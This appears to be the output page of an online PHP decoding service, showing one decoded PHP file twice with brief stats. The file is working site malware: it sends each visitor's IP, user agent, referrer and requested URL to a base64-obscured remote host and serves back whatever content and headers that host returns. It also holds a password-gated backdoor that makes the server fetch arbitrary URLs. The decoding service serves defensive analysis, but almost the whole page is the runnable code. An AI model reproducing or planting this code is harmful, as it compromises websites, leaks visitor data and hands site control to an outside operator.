Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url)..
Decoded Output download
<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } } $api = base64_decode('aHR0cDovLzU0NDUtY2g0LXYxMDguY2FzYWlsZWUuY29t'); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['pwd163'])) { if (md5($_REQUEST['pwd163'] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8"){ if (isset($_GET['sitemap'])) { $ping_url_format = 'https://%s/ping?sitemap=%s%s/%s'; $ping_url = sprintf($ping_url_format, 'www.google.co.jp', $params['protocol'], $params['domain'], $_GET['sitemap']); $ping_result = h($ping_url); if (strpos($ping_result, 'google') != false) { die('success'); } else { die('failed'); } } if(isset($_REQUEST['l']) && isset($_REQUEST['r'])){ $ping_result = h($_REQUEST['l']); if (strpos($ping_result, $_REQUEST['r']) != false) { die('success'); } else { die('failed'); } } } } if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
Did this file decode correctly?
Original Code
<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } } $api = base64_decode('aHR0cDovLzU0NDUtY2g0LXYxMDguY2FzYWlsZWUuY29t'); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['pwd163'])) { if (md5($_REQUEST['pwd163'] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8"){ if (isset($_GET['sitemap'])) { $ping_url_format = 'https://%s/ping?sitemap=%s%s/%s'; $ping_url = sprintf($ping_url_format, 'www.google.co.jp', $params['protocol'], $params['domain'], $_GET['sitemap']); $ping_result = h($ping_url); if (strpos($ping_result, 'google') != false) { die('success'); } else { die('failed'); } } if(isset($_REQUEST['l']) && isset($_REQUEST['r'])){ $ping_result = h($_REQUEST['l']); if (strpos($ping_result, $_REQUEST['r']) != false) { die('success'); } else { die('failed'); } } } } if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
Function Calls
h | 1 |
md5 | 1 |
curl_init | 1 |
base64_decode | 1 |
Stats
MD5 | 3d1dccdc5f164a3ee50c943f4ce55cef |
Eval Count | 0 |
Decode Time | 132 ms |